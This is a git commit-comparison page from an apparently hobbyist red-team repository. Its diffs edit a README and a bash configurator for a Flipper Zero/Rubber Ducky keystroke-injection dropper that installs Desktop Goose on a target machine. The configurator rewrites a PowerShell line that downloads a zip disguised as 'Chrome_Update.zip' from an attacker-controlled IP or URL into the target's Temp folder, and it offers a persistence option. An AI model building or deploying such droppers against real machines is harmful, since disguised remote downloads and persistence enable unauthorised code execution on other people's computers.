Compare commits
5 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
| 97f37c42db | |||
| 300a0bb90b | |||
| dc39957706 | |||
| 3ddebfa818 | |||
| f7ea353e8e |
@@ -4,6 +4,8 @@ This is a duckyscript originally designed for Flipper-Zero to drop Desktop Goose
|
|||||||
|
|
||||||
------------------------------------------------------------------------------------------------------
|
------------------------------------------------------------------------------------------------------
|
||||||
|
|
||||||
|
------------------------------------------------------------------------------------------------------
|
||||||
|
|
||||||
Currently there is no auto-configurator for Windows but it's in the works. Steps to configure manually:
|
Currently there is no auto-configurator for Windows but it's in the works. Steps to configure manually:
|
||||||
|
|
||||||
1) Replace the YOUR_IP value in GooseDropper.txt with your IP.
|
1) Replace the YOUR_IP value in GooseDropper.txt with your IP.
|
||||||
@@ -19,7 +21,6 @@ Currently there is no auto-configurator for Windows but it's in the works. Steps
|
|||||||
6) Copy to your Flipper or Rubber-Ducky and PWN!
|
6) Copy to your Flipper or Rubber-Ducky and PWN!
|
||||||
|
|
||||||
--------------------------------------------------------------------------------------------------------------
|
--------------------------------------------------------------------------------------------------------------
|
||||||
|
|
||||||
**Important Notes:**
|
**Important Notes:**
|
||||||
|
|
||||||
Ensure configuration is run while on the same network as your target, re-configure with each new network, unless the download location provided is publicly accessible.
|
Ensure configuration is run while on the same network as your target, re-configure with each new network, unless the download location provided is publicly accessible.
|
||||||
|
|||||||
@@ -21,9 +21,9 @@ elif [ "${DL}" == "2" ];
|
|||||||
then
|
then
|
||||||
#Get your URL
|
#Get your URL
|
||||||
read -p "Enter your URL: " SRC
|
read -p "Enter your URL: " SRC
|
||||||
SRC="$(echo "$SRC" | sed 's/\//\\\//g')"
|
|
||||||
#Add your URL to the payload
|
#Add your URL to the payload
|
||||||
sed -i "s/powershell wget YOUR_IP:1337\/Chrome_Update.zip -OutFile \$ENV:Temp\/Update.zip/powershell \"wget \'${SRC}\' -OutFile \$ENV:Temp\/Updater.zip\"/" GooseDropper.txt
|
sed -i "s/powershell wget YOUR_IP:1337\/Chrome_Update.zip -OutFile \$ENV:Temp\/Updater.zip/powershell \"wget \'$SRC\' -OutFile \$ENV:Temp\/Updater.zip\"/" GooseDropper.txt
|
||||||
|
|
||||||
#Remind users to have the zip ready
|
#Remind users to have the zip ready
|
||||||
echo "Please ensure a ZIP file with proper contents and formatting is hosted at the provided URL"
|
echo "Please ensure a ZIP file with proper contents and formatting is hosted at the provided URL"
|
||||||
@@ -36,14 +36,9 @@ else
|
|||||||
|
|
||||||
fi
|
fi
|
||||||
|
|
||||||
read -p "Create ZIP file to deliver Desktop Goose? [Y/N]: " COMP
|
|
||||||
|
|
||||||
#Check if Desktop Goose is present in this directory
|
#Check if Desktop Goose is present in this directory
|
||||||
GOOSE="$(ls | grep 'Desktop Goose v0.31.zip')"
|
GOOSE="$(ls | grep 'Desktop Goose v0.31.zip')"
|
||||||
|
|
||||||
if [ "${COMP,,}" == "y" ];
|
|
||||||
then
|
|
||||||
|
|
||||||
if [ "${GOOSE}" == "" ];
|
if [ "${GOOSE}" == "" ];
|
||||||
then
|
then
|
||||||
echo "Desktop Goose is not present in this directory, download it, or move it here"
|
echo "Desktop Goose is not present in this directory, download it, or move it here"
|
||||||
@@ -57,9 +52,6 @@ then
|
|||||||
rm -rf "Desktop Goose v0.31"* Update
|
rm -rf "Desktop Goose v0.31"* Update
|
||||||
clear
|
clear
|
||||||
fi
|
fi
|
||||||
else
|
|
||||||
break
|
|
||||||
fi
|
|
||||||
|
|
||||||
read -p "Configure Persistence? [Y/N]: " PERSIST
|
read -p "Configure Persistence? [Y/N]: " PERSIST
|
||||||
|
|
||||||
|
|||||||
@@ -0,0 +1,6 @@
|
|||||||
|
# Misadventures
|
||||||
|
This is a set of Red and Purple team tools I've developed, mostly just for fun, but some may find them useful.
|
||||||
|
|
||||||
|
Feel free to leave tips, comments, or suggestion in the comments, on my website at https://fr3ki.xyz or my twitter @Fr3ki_
|
||||||
|
|
||||||
|
Licence: https://www.gnu.org/licenses/gpl-3.0.html
|
||||||
Reference in New Issue
Block a user